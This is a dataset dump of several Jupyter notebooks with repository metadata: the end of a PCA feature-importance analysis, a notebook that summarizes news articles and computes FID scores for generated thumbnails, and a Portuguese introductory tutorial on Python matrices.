0.00267938455671\n315 acrol0299 0.00267454657876\n316 acrol0300 0.00266969338618\n317 acrol0301 0.00266492549726\n318 acrol0302 0.00266015537081\n319 acrol0303 0.00265534915361\n320 acrol0304 0.0026505797966\n321 acrol0305 0.00264586499601\n322 acrol0306 0.00264110989389\n323 acrol0307 0.00263634554499\n324 acrol0308 0.00263165292856\n325 acrol0309 0.00262682018566\n326 acrol0310 0.00262203559752\n327 acrol0311 0.00261715425485\n328 acrol0312 0.00261232325712\n329 acrol0313 0.00260752122524\n330 acrol0314 0.00260272800843\n331 acrol0315 0.00259798511388\n332 acrol0316 0.00259319358106\n333 acrol0317 0.00258848289349\n334 acrol0318 0.0025838311585\n335 acrol0319 0.00257923320399\n336 acrol0320 0.00257467888338\n337 acrol0321 0.00257017451821\n338 acrol0322 0.0025656610156\n339 acrol0323 0.00256124194049\n340 acrol0324 0.00255688517545\n341 acrol0325 0.00255261523199\n342 acrol0326 0.00254839082721\n343 acrol0327 0.00254426447056\n344 acrol0328 0.00254021580285\n345 acrol0329 0.00253614630599\n346 acrol0330 0.00253218064243\n347 acrol0331 0.00252824853365\n348 acrol0332 0.00252442152595\n349 acrol0333 0.00252059370572\n350 acrol0334 0.00251685883087\n351 acrol0335 0.00251317065344\n352 acrol0336 0.00250953661201\n353 acrol0337 0.00250588240079\n354 acrol0338 0.00250234666933\n355 acrol0339 0.00249885930584\n356 acrol0340 0.00249551828143\n357 acrol0341 0.00249217543461\n358 acrol0342 0.00248884006955\n359 acrol0343 0.00248564783615\n360 acrol0344 0.00248245645485\n361 acrol0345 0.00247935242318\n362 acrol0346 0.00247625574166\n363 acrol0347 0.00247325524385\n364 acrol0348 0.00247036163994\n365 acrol0349 0.00246738003648\n366 acrol0350 0.00246445313882\n367 acrol0351 0.00246157429188\n368 acrol0352 0.00245874198366\n369 acrol0353 0.00245592886533\n370 acrol0354 0.00245313664329\n"
],
[
"r, fs, subfs = 1, 0, 3\nfiln = glob.glob(\"data/results\" + str(r) + \"/fs_\" + str(fs) + \"_subfs_\" + str(subfs) + \"_*.npz\")[0]\nprint filn\nmodel_file = np.load(filn)\nmodel = model_file['model']\n#keep a list of the 1000 features kept\nmodel_feat_scores = model[0].named_steps['feature_selection'].scores_\nmodel_feat_scores = model[0].named_steps['feature_selection'].get_support(indices = True)\nmodel_pca_var = model[0].named_steps['decomp'].explained_variance_\nmodel_pca_var_rat = model[0].named_steps['decomp'].explained_variance_ratio_\nmodel_pca_covar = model[0].named_steps['decomp'].get_covariance()\nmodel_pca_mean = model[0].named_steps['decomp'].mean_\nn_comp = model[0].named_steps['decomp'].n_components_\ncomp = model[0].named_steps['decomp'].components_\nprint len(model_pca_var), model_pca_var\nprint len(model_pca_var_rat), model_pca_var_rat\nprint model_pca_covar.shape, model_pca_covar\n# plt.imshow(model_pca_covar)\nprint len(model_pca_mean), model_pca_mean\nprint n_comp\nprint comp.shape, comp\nnfeat = 1000\nfeat_importance = np.zeros(nfeat)\nfor nc in range(len(comp)):\n feat_importance += comp[nc]*model_pca_var_rat[nc]\n# plt.plot(range(1000),comp[nc]*model_pca_var_rat[nc])\nplt.plot(range(nfeat),feat_importance/nfeat)\nprint feat_importance*nfeat\nsort_feat_imp_ind = np.array(feat_importance).argsort()[:][::-1]\nprint np.array(featnames)[sort_feat_imp_ind]",
"data/results1/fs_0_subfs_3_tr_5_ts_4.npz\n20 [ 635.27304376 278.33611227 30.69938174 6.93535896 2.28809825\n 2.09643049 1.78208177 1.6961141 1.55467524 1.51123534\n 1.3664692 1.30327787 1.21026144 1.15230296 1.13857686\n 1.09402407 1.07557543 1.0462369 0.99788984 0.99201795]\n20 [ 0.63527304 0.27833611 0.03069938 0.00693536 0.0022881 0.00209643\n 0.00178208 0.00169611 0.00155468 0.00151124 0.00136647 0.00130328\n 0.00121026 0.0011523 0.00113858 0.00109402 0.00107558 0.00104624\n 0.00099789 0.00099202]\n(1000, 1000) [[ 27.37368911 0.92285356 0.0595558 ..., 0.12837082 0.12743588\n 0.21891365]\n [ 0.92285356 27.37368911 0.0595558 ..., 0.12837082 0.12743588\n 0.21891365]\n [ 0.0595558 0.0595558 27.24602051 ..., 0.79672983 0.79658456\n 0.68288268]\n ..., \n [ 0.12837082 0.12837082 0.79672983 ..., 27.29621694 0.84533024\n 0.7324894 ]\n [ 0.12743588 0.12743588 0.79658456 ..., 0.84533024 27.29611624\n 0.73233508]\n [ 0.21891365 0.21891365 0.68288268 ..., 0.7324894 0.73233508\n 27.09834563]]\n1000 [ -1.74010466e-15 -1.74010466e-15 2.29597143e-17 1.26640950e-15\n -4.08924595e-15 1.93344962e-16 -1.00539380e-15 0.00000000e+00\n -1.74010466e-15 1.20840601e-18 -4.83362405e-18 -2.41681203e-17\n -1.57092782e-17 -1.02714511e-17 0.00000000e+00 1.20840601e-18\n 3.62521804e-18 -3.14185563e-17 1.32924661e-17 3.62521804e-17\n 1.20840601e-17 4.59194285e-17 9.30472630e-17 -1.81260902e-18\n -4.83362405e-17 6.04203007e-19 -4.28984135e-17 2.53765263e-17\n -3.62521804e-18 1.38966692e-17 -3.62521804e-18 -1.32924661e-17\n 1.20840601e-17 -2.41681203e-17 1.69176842e-17 4.22942105e-18\n -7.73379848e-17 1.02714511e-17 1.20840601e-17 2.65849323e-17\n 6.82749397e-17 -1.46217128e-16 -7.25043608e-18 -2.36847579e-16\n 1.35341473e-16 6.64623307e-18 -4.83362405e-17 -1.02714511e-17\n 1.64343218e-16 4.83362405e-18 -1.26278428e-16 4.10858044e-17\n 2.15096270e-16 4.83362405e-17 -1.00297699e-16 4.47110225e-17\n 3.14185563e-17 -1.49842346e-16 1.42591910e-16 7.00875488e-17\n 4.10858044e-17 1.57092782e-17 2.05429022e-17 4.95446465e-17\n -4.83362405e-18 6.28371127e-17 5.55866766e-17 -2.90017443e-17\n 1.00297699e-16 -7.49211728e-17 -1.35341473e-16 1.81260902e-17\n 6.88791428e-17 8.94220450e-17 6.04203007e-17 -3.74605864e-17\n -1.34133067e-16 -1.37758286e-16 -9.54640750e-17 7.25043608e-18\n -7.73379848e-17 -2.17513082e-17 2.53765263e-17 -3.86689924e-17\n 1.66760030e-16 8.09632029e-17 -1.24465819e-16 1.06339729e-16\n -1.47425534e-16 2.05429022e-17 1.57092782e-16 -6.04203007e-18\n -1.47425534e-16 1.99386992e-16 1.64343218e-16 -2.47723233e-16\n 2.13887864e-16 1.36549879e-16 -9.54640750e-17 2.05429022e-17\n 1.02714511e-16 -8.70052330e-17 -2.41681203e-18 -3.74605864e-17\n 6.76707367e-17 -1.20840601e-18 -6.28371127e-17 -9.54640750e-17\n 5.92118946e-17 -9.42556690e-17 5.19614586e-17 4.35026165e-17\n 0.00000000e+00 -1.07548135e-16 -1.29299443e-16 8.57968269e-17\n -1.28091037e-16 -1.37758286e-16 3.62521804e-17 -9.42556690e-17\n 3.62521804e-17 4.95446465e-17 -1.22049007e-16 3.74605864e-17\n -7.61295788e-17 -3.86689924e-17 -8.45884209e-18 -1.01506105e-16\n 2.48931639e-16 -7.49211728e-17 2.06637428e-16 2.77933383e-17\n -6.04203007e-18 -5.43782706e-17 4.59194285e-17 -1.31716255e-16\n -1.12381759e-16 -1.37758286e-16 2.21138300e-16 -2.29597143e-17\n -2.50140045e-16 1.86094526e-16 1.06339729e-16 2.06637428e-16\n -1.17215383e-16 1.83677714e-16 1.36549879e-16 1.16006977e-16\n 1.29299443e-16 -1.28091037e-16 -4.22942105e-17 -2.41681203e-18\n 1.26882631e-16 -8.94220450e-17 8.21716089e-17 -6.04203007e-17\n -6.52539247e-17 -1.01506105e-16 1.77635684e-16 
\n[output truncated for readability: the cell printed ~1000 coefficient values that are numerically zero (magnitudes around 1e-15), the number 20, a (20, 1000) coefficient matrix, ~1000 per-feature score values, and the ranked feature-name array running from 'reFFT156' and the other imFFT/reFFT bins down to 'wavl' and 'rng']\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e707bca278c707fd6c676be691c91fd04116c87f | 26,421 | ipynb | Jupyter Notebook | post_process.ipynb | DeepTitan/thumbnails | 3c0ce261e7b040dd9ee9cf93f1460cf52a6a1f28 | [
"MIT"
] | null | null | null | post_process.ipynb | DeepTitan/thumbnails | 3c0ce261e7b040dd9ee9cf93f1460cf52a6a1f28 | [
"MIT"
] | null | null | null | post_process.ipynb | DeepTitan/thumbnails | 3c0ce261e7b040dd9ee9cf93f1460cf52a6a1f28 | [
"MIT"
] | null | null | null | 49.850943 | 1,486 | 0.604178 | [
[
[
"import numpy as np\nfrom PIL import Image\nfrom tqdm import tqdm\nimport json\nimport os\n\n#data = json.load(open('/Volumes/Elements/236_data/origin/data.json'))\nbase = '/Volumes/Elements/236_data/origin/'\n\n\nfrom transformers import pipeline",
"_____no_output_____"
],
[
"summarizer = pipeline(\"summarization\")\n",
"No model was supplied, defaulted to sshleifer/distilbart-cnn-12-6 (https://huggingface.co/sshleifer/distilbart-cnn-12-6)\n"
],
[
"#find data where 'id' = 107629\nfor i in range(len(data)):\n if data[i]['id'] == 107629:\n print(data[i])\n break",
"{'id': 107629, 'caption': 'Marissa Mayer poses at Google s Mountain View California headquarters in this February 24 2009 file photo', 'topic': 'arts_culture', 'source': 'washington_post', 'image_path': './washington_post/images/0418/478.jpg', 'article_path': './washington_post/articles/107629.txt'}\n"
],
[
"text = \"\"\"For four long years members of the US Congress had to smile or scowl as a TV star played the role of president.\n\nDonald Trump became infamous for the art of lying. On Wednesday another TV performer turned national leader came before Congress. But this one captivated his viewers with truth telling.\n\nThe Ukrainian president, Volodymyr Zelenskiy, a former actor and comedian facing down the Russian war machine, has an instinctive understanding of the camera but is proving a more serious man for more serious times.\n\nDespite being under siege in Kyiv, Zelenskiy has been on a virtual tour of western capitals over the past three weeks, tailoring his speeches to each nation. Speaking virtually to the British parliament, he cited William Shakespeare and Winston Churchill, while he asked members of its Canadian equivalent to imagine waking at 4am to bombs dropping on Ottawa’s airport or Toronto’s CN Tower.\n\nThe Axios website described it as a “signature blend of praising, chastising and pleading with his audience to understand the global stakes of Ukraine’s resistance” which has produced unexpected commitments such as oil and Swift banking sanctions.\n\nSo it was that in a packed auditorium in the basement of the US Capitol in Washington, Zelenskiy, whose words were translated from Ukrainian into English by a female interpreter, conjured the demons of two days when America was attacked from the skies to renew his plea for a no-fly zone above Ukraine.\n\n“Remember Pearl Harbor, the terrible morning of December 7, 1941, when your sky was black from the planes attacking you,” said Zelenskiy, looming large on a cinema screen, wearing perfectly trimmed hair and beard and a green T-shirt, against a white backdrop with a Ukrainian flag to one side.\n\n“Remember September 11, a terrible day in 2001 when evil tried to turn your cities, independent territories, into battlefields. When innocent people were attacked from the air. Our country is experiencing the same every day, right now, at this moment. Every night for three weeks now … Russia has turned the Ukrainian sky into a source of death for thousands of people.”\n\nCombined with references to Mount Rushmore and Martin Luther King’s “I have a dream speech”, Zelenskiy, was pushing America’s most emotive buttons with words. But he also knows that this is the nation of network television, cable news, Hollywood, Netflix and social media. So words alone would not do.\n\nZelenskiy asked the members of the House of Representatives and Senate to watch a searing video compilation showing the hell that Russian troops have rained down on Ukraine and its citizens. It contrasted idyllic images of children playing in peaceful towns and cities with explosions, destruction, sobbing, refugees, hospitals and corpses, accompanied by the lament of a violin.\n\nAccording to a pooled report by the Associated Press, “As Zelenskiy played the video of violence, the room was very quiet and members were mostly still. Some shook their heads or wiped eyes or took video. Small amount of applause afterward.”\n\nThen came a simple message written in white letters on a black backdrop: “Close the sky over Ukraine.”\n\nTragic in the truest sense because this is the one thing that Congress, and Joe Biden, will not do, fearing that a no-fly zone, in which US pilots shoot down Russians, could trigger a third world war. 
Perhaps aware of this reluctance, Zelenskiy did not dwell on the issue for long, pivoting to a request for surface-to-air missile systems and urging Washington to “do more”.\n\nBut the video had a wider purpose. It was shown to millions of American TV viewers just after 9am. It caught TV executives by surprise and they did not have time to censor it; some anchors apologised for its graphic content. It spread far and wide on social media. In the court of public opinion, the video humanised the victims and conveyed the message that our struggle is your struggle.\n\nZelenskiy had again shown himself to be a master of the medium, inviting comparisons with Vladimir Putin’s efforts to lie low, clamp down on media, crush all dissent and turn Russia into North Korea. Zelenskiy is running rings around Putin in the soft power arena with his speeches and intimate phone videos; Russia is not faring especially well with hard power either.\n\nOn Wednesday the Ukrainian president ended his speech by addressing the room in English. “Now, I’m almost 45 years old,” he said. “Today my age stopped when the heart of more than 100 children stopped beating. I see no sense in life if it cannot stop the deaths.”\n\nThere was also a direct appeal to Biden: “I wish for you to be the leader of the world. Being the leader of the world means to be the leader of peace.”\n\nThe auditorium erupted in a bipartisan standing ovation. Chris Murphy, a Democratic senator, tweeted: “There’s no member of Congress left that room without thinking what more the United States can do to stop this carnage. Just a gut wrenching speech. #SlavaUkraine.”\n\nIn an era of Trumpism, fake news and disinformation, Zelenskiy, who used to play a fictional president, had cut through with his sincerity. For him and Ukraine, it already feels like a third world war; that is their truth. And the temptation for America to flex its superpower muscles is stronger than ever.\n\nTragic in the truest sense because this is the one thing that Congress, and Joe Biden, will not do, fearing that a no-fly zone, in which US pilots shoot down Russians, could trigger a third world war. Perhaps aware of this reluctance, Zelenskiy did not dwell on the issue for long, pivoting to a request for surface-to-air missile systems and urging Washington to “do more”.\n\nBut the video had a wider purpose. It was shown to millions of American TV viewers just after 9am. It caught TV executives by surprise and they did not have time to censor it; some anchors apologised for its graphic content. It spread far and wide on social media. In the court of public opinion, the video humanised the victims and conveyed the message that our struggle is your struggle.\n\nZelenskiy had again shown himself to be a master of the medium, inviting comparisons with Vladimir Putin’s efforts to lie low, clamp down on media, crush all dissent and turn Russia into North Korea. Zelenskiy is running rings around Putin in the soft power arena with his speeches and intimate phone videos; Russia is not faring especially well with hard power either.\n\nOn Wednesday the Ukrainian president ended his speech by addressing the room in English. “Now, I’m almost 45 years old,” he said. “Today my age stopped when the heart of more than 100 children stopped beating. I see no sense in life if it cannot stop the deaths.”\n\nThere was also a direct appeal to Biden\"\"\"\n\n\nsummarizer(text)",
"_____no_output_____"
],
[
"def summarized_docs(ids):\n summaries = {}\n for id in tqdm(ids):\n #find data with id\n art_path = None\n caption = None\n for d in data:\n if d['id'] == id:\n art_path = base + d['article_path'][2:]\n caption = d['caption']\n print(art_path)\n break\n #print article \n with open(art_path, 'r') as f:\n art = f.read()\n #split into words\n art = art.split()\n #take first 700 words\n art = art[:500]\n #join words\n art = ' '.join(art)\n print(len(art))\n\n text = summarizer(art, min_length=5, max_length=50)[0]['summary_text']\n #add to dict\n summaries[id] = {'caption': caption, 'summary': text}\n print(text)\n\n return summaries\n",
"_____no_output_____"
],
[
"#pick 128 random images from the ./test folder\nrandom_imgs = np.random.choice(os.listdir('./test'), 128, replace=False)\n#remove the .jpg extension from the images\nrandom_imgs = [img[:-4] for img in random_imgs]\n#convert to list of ints\nrandom_imgs = [int(img) for img in random_imgs]\nsummaries = summarized_docs(random_imgs)\n\n#save to json\nwith open('./test_summaries.json', 'w') as f:\n json.dump(summaries, f)\n",
"_____no_output_____"
],
[
"!pwd",
"huggingface/tokenizers: The current process just got forked, after parallelism has already been used. Disabling parallelism to avoid deadlocks...\nTo disable this warning, you can either:\n\t- Avoid using `tokenizers` before the fork if possible\n\t- Explicitly set the environment variable TOKENIZERS_PARALLELISM=(true | false)\n/Users/isaiahwilliams/thumbnail\n"
],
[
"fake_summ_ft_path = '/Users/isaiahwilliams/thumbnail/fake/summary/ft/'\nfake_caption_ft_path = '/Users/isaiahwilliams/thumbnail/fake/caption/ft/'\nfake_summ_base_path = '/Users/isaiahwilliams/thumbnail/fake/summary/base/'\nfake_caption_base_path = '/Users/isaiahwilliams/thumbnail/fake/caption/base/'\n\nfor i in range (1, len(os.listdir(fake_summ_ft_path))):\n #get os list files only\n fake_summ_ft_files = os.listdir(fake_summ_ft_path)\n fake_summ_ft_files = [f for f in fake_summ_ft_files if os.path.isfile(fake_summ_ft_path + f)]\n folder_name = fake_summ_ft_files[0].split('_')[0][2:]\n #make folder of folder name\n os.mkdir(fake_summ_ft_path + folder_name)\n #move all files containing folder name to folder\n for f in fake_summ_ft_files:\n if folder_name in f:\n os.rename(fake_summ_ft_path + f, fake_summ_ft_path + folder_name + '/' + f)\n \n ########################################################################################################################\n fake_caption_ft_files = os.listdir(fake_caption_ft_path)\n fake_caption_ft_files = [f for f in fake_caption_ft_files if os.path.isfile(fake_caption_ft_path + f)]\n folder_name = fake_caption_ft_files[0].split('_')[0][2:]\n #make folder of folder name\n os.mkdir(fake_caption_ft_path + folder_name)\n #move all files containing folder name to folder\n for f in fake_caption_ft_files:\n if folder_name in f:\n os.rename(fake_caption_ft_path + f, fake_caption_ft_path + folder_name + '/' + f)\n\n\n ########################################################################################################################\n fake_summ_base_files = os.listdir(fake_summ_base_path)\n fake_summ_base_files = [f for f in fake_summ_base_files if os.path.isfile(fake_summ_base_path + f)]\n folder_name = fake_summ_base_files[0].split('_')[0][2:]\n #make folder of folder name\n os.mkdir(fake_summ_base_path + folder_name)\n #move all files containing folder name to folder\n for f in fake_summ_base_files:\n if folder_name in f:\n os.rename(fake_summ_base_path + f, fake_summ_base_path + folder_name + '/' + f)\n\n\n ########################################################################################################################\n fake_caption_base_files = os.listdir(fake_caption_base_path)\n fake_caption_base_files = [f for f in fake_caption_base_files if os.path.isfile(fake_caption_base_path + f)]\n folder_name = fake_caption_base_files[0].split('_')[0][2:]\n #make folder of folder name\n os.mkdir(fake_caption_base_path + folder_name)\n #move all files containing folder name to folder\n for f in fake_caption_base_files:\n if folder_name in f:\n os.rename(fake_caption_base_path + f, fake_caption_base_path + folder_name + '/' + f)\n\n\n###THIS RETURNS AN ERROR BUT STILL WORKS WITH ZIP FILE\n\n",
"_____no_output_____"
],
[
"#find data where id = '111268'\n\nfor ",
"_____no_output_____"
],
[
"fake_summ_ft_path = '/Users/isaiahwilliams/thumbnail/fake/summary/ft/'\nfrom tqdm import tqdm\nfor path in tqdm(os.listdir(fake_summ_ft_path)):\n #get os list files only\n if os.path.isdir(fake_summ_ft_path + path):\n #print(path)\n id = path\n real_img_path = '/Users/isaiahwilliams/thumbnail/test/' + str(id) + '.jpg'\n new_dest = '/Users/isaiahwilliams/thumbnail/real/' + str(id) + '.jpg'\n !cp '{real_img_path}' '{new_dest}'",
"100%|██████████| 113/113 [00:14<00:00, 7.64it/s]\n"
],
[
"for i in range(len(data)):\n if data[i]['id'] == id:\n print(data[i])\n break",
"{'id': 107629, 'caption': 'Marissa Mayer poses at Google s Mountain View California headquarters in this February 24 2009 file photo', 'topic': 'arts_culture', 'source': 'washington_post', 'image_path': './washington_post/images/0418/478.jpg', 'article_path': './washington_post/articles/107629.txt'}\n"
],
[
"#loop through all files in test_f and put them in their own folder\nfor filename in os.listdir('./test_f'):\n #make folder with filename\n folder_name = filename[:-4]\n os.mkdir('./test_f/' + folder_name)\n #move file into folder\n os.rename('./test_f/' + filename, './test_f/' + folder_name + '/' + filename)\n",
"_____no_output_____"
],
[
"#loop through all files in test_f and duplicate them 3 tiems\nimport shutil\nfor filename in os.listdir('./test_f'):\n #check if filename is a folder\n #chec kif filename is an int\n if os.path.isdir('./test_f/' + filename) and filename.isdigit():\n for filename2 in os.listdir('./test_f/' + filename):\n shutil.copy('./test_f/' + filename + '/' + filename2, './test_f/' + filename + '/' + filename2[:-4] + '_2.jpg')\n shutil.copy('./test_f/' + filename + '/' + filename2, './test_f/' + filename + '/' + filename2[:-4] + '_3.jpg')\n shutil.copy('./test_f/' + filename + '/' + filename2, './test_f/' + filename + '/' + filename2[:-4] + '_4.jpg')\n \n ",
"_____no_output_____"
],
[
"#loop through all files in test_f and duplicate them 3 tiems\nimport shutil\nfor filename in os.listdir('./test_f'):\n #check if filename is a folder\n #chec kif filename is an int\n if os.path.isdir('./test_f/' + filename) and filename.isdigit():\n #remove all files that are not jpg\n for filename2 in os.listdir('./test_f/' + filename):\n if filename2[-4:] != '.jpg':\n os.remove('./test_f/' + filename + '/' + filename2)",
"_____no_output_____"
]
],
[
[
"## RUN THIS TO GET FID SCORES ON DATA\n",
"_____no_output_____"
]
],
[
[
"fake_summ_ft_path = '/Users/isaiahwilliams/thumbnail/fake/summary/ft/'\nfake_caption_ft_path = '/Users/isaiahwilliams/thumbnail/fake/caption/ft/'\nfake_summ_base_path = '/Users/isaiahwilliams/thumbnail/fake/summary/base/'\nfake_caption_base_path = '/Users/isaiahwilliams/thumbnail/fake/caption/base/'\nreal_path = '/Users/isaiahwilliams/thumbnail/real/'\n\n!python -m pytorch_fid $fake_summ_ft_path $real_path\n!python -m pytorch_fid $fake_caption_ft_path $real_path\n!python -m pytorch_fid $fake_summ_base_path $real_path\n!python -m pytorch_fid $fake_caption_base_path $real_path\n\n\n\n\n \n",
"100%|█████████████████████████████████████████████| 9/9 [02:00<00:00, 13.38s/it]\n100%|█████████████████████████████████████████████| 3/3 [00:35<00:00, 11.99s/it]\nFID: 179.1055763799293\n100%|█████████████████████████████████████████████| 9/9 [02:00<00:00, 13.41s/it]\n100%|█████████████████████████████████████████████| 3/3 [00:36<00:00, 12.17s/it]\nFID: 175.01754727685386\n100%|█████████████████████████████████████████████| 9/9 [02:07<00:00, 14.15s/it]\n100%|█████████████████████████████████████████████| 3/3 [00:36<00:00, 12.15s/it]\nFID: 307.83396283686074\n100%|█████████████████████████████████████████████| 9/9 [02:01<00:00, 13.46s/it]\n100%|█████████████████████████████████████████████| 3/3 [00:36<00:00, 12.07s/it]\nFID: 311.18955829185677\n"
],
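[
"# Added sketch (not in the original notebook): collect the FID scores printed\n# above into a dict for easier comparison. Values are copied from the cell\n# output; the dict keys are hypothetical labels for the four runs.\nfid_scores = {\n    'summary_ft': 179.1055763799293,\n    'caption_ft': 175.01754727685386,\n    'summary_base': 307.83396283686074,\n    'caption_base': 311.18955829185677,\n}\nprint(min(fid_scores, key=fid_scores.get))  # caption_ft has the lowest FID",
"_____no_output_____"
],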
[
"# fake_summ_ft_path = '/Users/isaiahwilliams/thumbnail/fake/summary/ft/'\n# fake_caption_ft_path = '/Users/isaiahwilliams/thumbnail/fake/caption/ft/'\n# fake_summ_base_path = '/Users/isaiahwilliams/thumbnail/fake/summary/base/'\n# fake_caption_base_path = '/Users/isaiahwilliams/thumbnail/fake/caption/base/'\n# real_path = '/Users/isaiahwilliams/thumbnail/real/'\n\n# files = []\n# #loop through all files in fake_summ_ft_path\n# for filename in os.listdir(fake_summ_ft_path):\n# filename_cf = fake_caption_ft_path + filename.replace('sf', 'cf')\n# filename_sb = fake_summ_base_path + filename.replace('sf', 'sb')\n# filename_cb = fake_caption_base_path + filename.replace('sf', 'cb')\n# filename_real = real_path + filename.split('_')[0][2:] + '.jpg'\n# filename_sf = fake_summ_ft_path + filename\n# files.extend([filename_cf, filename_sb, filename_cb, filename_real, filename_sf])\n\n# #check if file is a file\n\n# #loop through all files in files",
"_____no_output_____"
],
[
"# for path in os.listdir('/Users/isaiahwilliams/thumbnail/fake/'):\n# if os.path.isdir('/Users/isaiahwilliams/thumbnail/fake/' + path):\n# for filename in os.listdir('/Users/isaiahwilliams/thumbnail/fake/' + path):\n# if os.path.isdir('/Users/isaiahwilliams/thumbnail/fake/' + path + '/' + filename):\n# for filename2 in os.listdir('/Users/isaiahwilliams/thumbnail/fake/' + path + '/' + filename):\n# full_path = '/Users/isaiahwilliams/thumbnail/fake/' + path + '/' + filename + '/' + filename2\n# #split on '_'\n# number = int(filename2.split('_')[1][:-4])\n# #if number is greater than 3 then delete\n# if number > 3:\n# os.remove(full_path)\n\n# if full_path not in files:\n# os.remove(full_path)\n# print(full_path)\n\n# for path in os.listdir('/Users/isaiahwilliams/thumbnail/real'):\n# full_path = '/Users/isaiahwilliams/thumbnail/real/' + path\n# if full_path not in files:\n# os.remove(full_path)\n# print(full_path)\n",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
e707c3589a5ae3b213ff401d124ff018b82bb2aa | 11,133 | ipynb | Jupyter Notebook | Fontes-UDF/programming/Matriz.ipynb | IgorWinMac/UDF-Material | 96f544f4a7399360f3855f3d082a6cea8f787dd0 | [
"MIT"
] | null | null | null | Fontes-UDF/programming/Matriz.ipynb | IgorWinMac/UDF-Material | 96f544f4a7399360f3855f3d082a6cea8f787dd0 | [
"MIT"
] | null | null | null | Fontes-UDF/programming/Matriz.ipynb | IgorWinMac/UDF-Material | 96f544f4a7399360f3855f3d082a6cea8f787dd0 | [
"MIT"
] | null | null | null | 20.616667 | 203 | 0.469415 | [
[
[
"# Matrizes",
"_____no_output_____"
],
[
"## Introdução",
"_____no_output_____"
],
[
"Matrizes são estruturas largamente utilizadas na computação e em áreas como Estatística. São, basicamente, vetor de duas dimensões, no qual um valor é localizado por dois índices:",
"_____no_output_____"
]
],
[
[
"linha1 = [\"A\", \"B\", \"C\"]\nlinha2 = [\"D\", \"E\", \"F\"]\n\nmatriz = [linha1, linha2]\n\nprint(matriz[0][1]) # segundo valor da primeira linha\nprint(matriz[1][2]) # terceiro valor da segunda linha\n",
"_____no_output_____"
]
],
[
[
"Uma matriz pode ser a representação de uma tabela de valores. Veja um exemplo:\n\nVendas de Produtos/Quinzena\n\n| | 1a Quinzena | 2a Quinzena | 3a Quinzena |\n|----------|:-------------:|------:|------:\n| Prod1 | 100 | 15 | 40 |\n| Prod2 | 200 | 30 | 80 |\n| Prod3 | 40 | 120 | 60 |\n",
"_____no_output_____"
],
[
"A matriz que representa essa tabela é composta por 3 linhas e colunas:\n\n```\n 100 15 40\n 200 30 80\n 40 120 60\n\n```",
"_____no_output_____"
],
[
"E em uma linguagem como Python, essa matriz pode ser representada da seguinte forma:",
"_____no_output_____"
]
],
[
[
"vendas = [[100,15,40],[200,30,80],[40,120,60]]\n\nfor linha in vendas:\n for coluna in linha:\n print(coluna)\n \nfor i in range(len(vendas)):\n for j in range(len(vendas[i])):\n print(vendas[i][j])\n",
"100\n15\n40\n200\n30\n80\n40\n120\n60\n100\n15\n40\n200\n30\n80\n40\n120\n60\n"
]
],
[
[
"## Posições em uma matriz",
"_____no_output_____"
],
[
"Como em um vetor, as posições da linha e coluna começam no número zero. Veja a matriz abaixo:\n\n```\n 100 15 40\n 200 30 80\n 40 120 60\n\n```",
"_____no_output_____"
],
[
"- A posição do valor 100 é 0,0\n- A posição do valor 120 é 2,1\n- A posição do valor 40 é 0,2",
"_____no_output_____"
],
[
"## Inicializando uma matriz",
"_____no_output_____"
],
[
"**Manualmente**",
"_____no_output_____"
]
],
[
[
"matriz = [[0,0,0],[0,0,0]]",
"_____no_output_____"
]
],
[
[
"**Usando uma estrutura de repetição**",
"_____no_output_____"
]
],
[
[
"a = [0]*3\nfor i in range(3):\n a[i] = [0]*3\nprint(a)",
"[[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n"
]
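,
[
"# Added sketch (not in the original notebook): the same initialization with a\n# list comprehension. Beware that [[0]*3]*3 would repeat the SAME inner list,\n# so changing one row would appear to change all of them.\nb = [[0]*3 for _ in range(3)]\nprint(b)",
"_____no_output_____"
]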
],
[
[
"## Acessando valores de uma matriz",
"_____no_output_____"
],
[
"É feita como em um vetor, com a diferença que são necessários dois índices para se acessar uma posição:\n\n```\nA B C\nD E F\nG H I\n\n```",
"_____no_output_____"
],
[
"Na matriz acima, o valor F está na segunda linha e terceira coluna. Veja em Python:",
"_____no_output_____"
]
],
[
[
"matriz = [[\"A\",\"B\",\"C\"],[\"D\",\"E\",\"F\"],[\"G\",\"H\",\"I\"]]\nprint(matriz[1][2])",
"F\n"
]
],
[
[
"## Alterando valores de uma matriz",
"_____no_output_____"
],
[
"A operação de alteração é feita como no vetor, dessa vez com dois índices:",
"_____no_output_____"
]
],
[
[
"matriz = [[\"A\",\"B\",\"C\"],[\"D\",\"E\",\"F\"],[\"G\",\"H\",\"I\"]]\nprint(\"2a linha, 3a coluna:\", matriz[1][2])\nmatriz[1][2] = \"T\"\n\n# Note que o valor F será trocado pelo T\n\nprint(matriz)",
"2a linha, 3a coluna: F\n[['A', 'B', 'C'], ['D', 'E', 'T'], ['G', 'H', 'I']]\n"
]
],
[
[
"## Imprimir uma matriz inteira",
"_____no_output_____"
],
[
"Considere a matriz abaixo:",
"_____no_output_____"
]
],
[
[
"vendas = [[\"Produto 1\", 100,15,40],[\"Produto 2\", 200,30,80],[\"Produto 3\",40,120,60]]\n\nfor linha in vendas:\n imprimir = \"\"\n for coluna in linha:\n imprimir += str(coluna) + \" \"\n print(imprimir)\n",
"Produto 1 100 15 40 \nProduto 2 200 30 80 \nProduto 3 40 120 60 \n"
]
],
[
[
"## Imprimir uma linha da matriz",
"_____no_output_____"
]
],
[
[
"vendas = [[\"Produto 1\", 100,15,40],[\"Produto 2\", 200,30,80],[\"Produto 3\",40,120,60]]\nprint(vendas[0])",
"['Produto 1', 100, 15, 40]\n"
]
],
[
[
"## Imprimindo uma coluna da matriz",
"_____no_output_____"
],
[
"Bibliotecas como Numpy trazem a facilidade de operar uma matriz mas, supondo a ausência de bibliotecas como essa, deve-se percorrer cada linha e selecionar a coluna desejada:",
"_____no_output_____"
]
],
[
[
"vendas = [[\"Produto 1\", 100,15,40],[\"Produto 2\", 200,30,80],[\"Produto 3\",40,120,60]]\ncol = 1\nfor linha in vendas:\n print(linha[col])",
"100\n200\n40\n"
]
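,
[
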